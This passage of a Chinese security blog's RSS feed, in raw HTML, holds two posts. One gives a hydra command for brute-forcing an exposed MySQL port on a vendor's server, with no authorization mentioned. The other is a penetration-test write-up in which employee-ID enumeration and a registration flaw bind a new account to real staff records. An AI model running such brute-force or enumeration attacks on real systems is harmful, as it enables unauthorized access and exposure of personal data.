textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=c7bbd772&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499371%26idx%3D1%26sn%3D32c47ad71d300fe9cbe182df852f982c">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 23 Apr 2026 10:13:00 +0800</pubDate>
    </item>
    <item>
      <title>端口爆破神器</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499343&amp;idx=1&amp;sn=b3e26ae05a14f92796da346900154c9b</link>
      <description>爆破神器-hydra正文某日,发现厂商3306端口居然是对外开放的:于是想到了用这个工具来爆破,简单安装sud</description>
      <content:encoded><![CDATA[<p>原创 <span>richardo1o1</span> <span>2026-04-22 10:00</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=933f0b73&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRzuHfR95vAtXh0U6IkX2rfAYXDybwPiawohcCOcMVd9NuvFfWID7Sp41Mtz0BJ6cgvQsxJA6suJLkLP1UicRrPtOsMHYQgAGvLnU%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">爆破神器-hydra</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=401de3fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRzXKkFTufXRnoicznIOYqJxHKJMeDBAwJITTbwbgQKqMnmVAsSQgicKsSWRx5fDlobvfL6F923uAtgkOGGpnGmkmsU7Q9Dfiayia8k%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">某日,发现厂商3306端口居然是对外开放的:</span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100015690" data-ratio="0.125" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=31dce957&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRw3dkkWdc0PZvzrsdHqBIEp9MfKjo1wQ2HLdL8O8kyujkIJCBddhwicuEYrPwOC0mHhpvPHzHaWbGg2rdBCsliaySJz1zQ7vgUb4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">于是想到了用这个工具来爆破,简单安装</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">sudo apt-get install hydra~</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">而后直接爆破即可:</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">hydra -L database_username.txt -P database_password.txt mysql://服务器ip:3306</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">666</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=52cd53b8&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499343%26idx%3D1%26sn%3Db3e26ae05a14f92796da346900154c9b">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 22 Apr 2026 10:00:00 +0800</pubDate>
    </item>
    <item>
      <title>丝滑渗透测试之有趣的注册逻辑</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499336&amp;idx=1&amp;sn=00539fdac4847c0b2dc10bcab240ca20</link>
      <description>声明：请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。旧饭新炒，哈哈</description>
      <content:encoded><![CDATA[<p><span>pippybear</span> <span>2026-04-21 10:00</span> <span style="display: inline-block;">四川</span></p>




  <p>以下文章来源于：安全无界</p>
  <strong>安全无界</strong>
  <p>面向年轻的网络安全爱好者，分享网络安全技术、工具和趋势。</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=2143f8f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F7xtecWUgCRwv9BOtUVzoNnZYP7L3ibib18xUxBtg91Ct93X1qYgUyGPRvtFhctzlYZIZicoOHx6554nA8yBFoAXLggUBlXQ8MdgwhOm6vjr4Ks%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p data-mpa-powered-by="yiban.io" data-pm-slice="3 3 []" style="line-height: 1.6em;margin-bottom: 24px;"><span style="letter-spacing: 0.578px;"><span leaf="">声明：</span></span><span style="letter-spacing: 0.578px;"><span leaf="">请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果</span></span><span style="letter-spacing: 0.578px;"><span leaf="">与文章作者和本公众号无关。</span></span></p><p data-mpa-powered-by="yiban.io" data-pm-slice="3 3 []" style="line-height: 1.6em;text-indent: 2em;margin-bottom: 24px;"><span leaf="">旧饭新炒，哈哈，这是很久之前的一次授权渗透测试了，目标是一个学习系统，这一次比之前好多了，虽然依旧没有给账号，但是简单看了一下系统，它有注册功能呀，舒服。</span></p><p style="text-align: center;line-height: 1.6em;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001915" data-ratio="1.0398148148148147" data-s="300,640" type="block" data-type="png" data-w="1080" style="width: 403px;height: 419px;" src="https://wechat2rss.xlab.app/img-proxy/?k=fd868f57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPX3f9ey6PzMKKheiaf1bkFDmVCuuw81CKWgXTXyY0EMmSH1gB9abXlvhxgDwB8iatheQS7EMB3ibncG6RVbYkBhbOZV8rxIbWQxv0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="line-height: 1.6em;text-indent: 2em;margin-bottom: 24px;"><span leaf="">废话不多说，直接开始正文，这里是工号+密码的组合，直接冲去目标客户各网站上检索工号，很幸运，在几个页面上找到了工号，构造差不多是年份+4位数字，直接生成工号列表撞库一波，运气不佳，没有找到弱口令。</span></p><p style="text-align: center;line-height: 1.6em;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001913" data-ratio="0.1648148148148148" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=727b6cef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F72I8gAalpPWz96vCVjCHXmk3ce62YUdy2xmLWH8444uOgHnUCfyjxLzRMibgmY6It8lqibXwt7goB79onRO8680NicGib7xUybyja9GD6rpFOfE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="line-height: 1.6em;text-indent: 2em;margin-bottom: 24px;"><span leaf="">既然不成功，那就先看看注册功能。</span></p><p style="text-align: center;line-height: 1.6em;margin-bottom: 24px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1425925925925926" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100001916" src="https://wechat2rss.xlab.app/img-proxy/?k=052b0156&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPWgDGiaaVd5dveAXe7ibbY91UIlLFMda80iaUYP4cdCPkpoA7iaIJG0B0x4k5Ar2sMnx2ucibAp7kMCiauIRicdHSy9FnVrZY0ZicrIa8E%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="line-height: 1.6em;text-indent: 2em;margin-bottom: 24px;"><span leaf="">需要输入工号、姓名，还好前面知道工号的构造，这里直接遍历跑一波，发现工号不存在会直接提示人不存在</span></p><p style="text-align: center;line-height: 1.6em;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001917" data-ratio="0.358974358974359" data-s="300,640" type="block" data-type="png" data-w="468" src="https://wechat2rss.xlab.app/img-proxy/?k=c3e79dea&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F72I8gAalpPUVtJo8bCaI8c5TsQMv3e6BJicR7VwqkJ4DIm8sefBB6h4XBa1tqkicQ7ic3el6cUkZ8MlDwNliaibgULQKaaGeicB1icTc4UbEtOnOB0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="line-height: 1.6em;text-indent: 2em;margin-bottom: 24px;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,null,&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;line-height: 1.6em; text-indent: 2em;&#34;},&#34;namespaceURI&#34;:&#34;&#34;}]">存在则可直接注册成功，YYDS，直接注册进入系统。</span></p><p style="margin-bottom: 24px;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001923" data-ratio="0.6" data-s="300,640" type="block" data-type="png" data-w="1150" src="https://wechat2rss.xlab.app/img-proxy/?k=3a60b635&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPWbOiaicawibkQwWKqjmncXkUDBUojn9HcZhTVEAUnibRwovxzHe6hUmpg6ZwV8hdxHsA16HOMdZP5FgdhIU5zyibjMkjnFZmGD7Kps%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="line-height: 1.6em;text-indent: 2em;margin-bottom: 24px;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,null,&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;line-height: 1.6em; text-indent: 2em;&#34;},&#34;namespaceURI&#34;:&#34;&#34;}]">使用注册成功的账号进入系统，见证奇迹的时候到了，发现登录进来并不是我随便输入的姓名：test，似乎是一个真实的姓名。</span></p><p style="margin-bottom: 24px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.21124361158432708" data-s="300,640" data-type="png" data-w="1174" type="block" data-imgfileid="100001924" src="https://wechat2rss.xlab.app/img-proxy/?k=fb79d04f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPX4EzGbXdoFicRkuDwfVGT5dVRZqpJ5WYcaZlsE2ptFd5Zv2W5libvcRRmmK5264riaq0ZxUZTia5oIibLHuickv6UmNayD5ZqCyR0NU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div style="margin-bottom: 24px;"><p style="line-height: 1.6em;text-indent: 2em;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;line-height: 1.6em; text-indent: 2em;&#34;},&#34;namespaceURI&#34;:&#34;&#34;}]">点击上传证照，发现这里居然是有数据的，包括该工号的证件信息以及一些敏感数据。</span></p></div><p style="margin-bottom: 24px;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001925" data-ratio="0.35353535353535354" data-s="300,640" type="block" data-type="png" data-w="1584" src="https://wechat2rss.xlab.app/img-proxy/?k=59bb4738&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPVvxRZ8LxTia6dIiaQzw4HxHS9ex6Sl9sOiaIAjBA60zEydlK9bIwyqhDDNjtibQzzDNGx1IGqicX41MvHuUMeVgdTKFiccMuSyCVfMg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="line-height: 1.6em;text-indent: 2em;margin-bottom: 24px;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,null,&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;&#34;}]">神奇了，大概捋一捋，估摸着这里有一个比较有趣的注册逻辑，即使用已知工号注册，这里不会提示账号存在，而是直接与系统中该工号的员工信息绑定，好家伙，直接梳理梳理交付报告。</span></p><div style="margin-bottom: 24px;"><p style="text-align: center;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: center;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="line-height: 1.6em;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" 